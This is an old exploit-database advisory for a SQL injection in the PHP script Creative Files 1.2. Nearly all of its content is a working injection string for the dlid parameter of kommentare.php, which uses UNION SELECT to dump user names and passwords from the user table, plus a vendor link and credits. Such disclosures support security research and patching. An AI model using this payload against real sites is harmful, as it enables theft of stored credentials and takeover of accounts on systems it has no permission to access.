Creative Files 1.2 - 'kommentare.php' SQL Injection

EDB-ID:

3498


Platform:

PHP

Published:

2007-03-16

======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php)  Remote SQL Injection Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Bulan: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================
+
+ Thnx: pang0, unique
+
======================X=O=R=O=N=====================

# milw0rm.com [2007-03-16]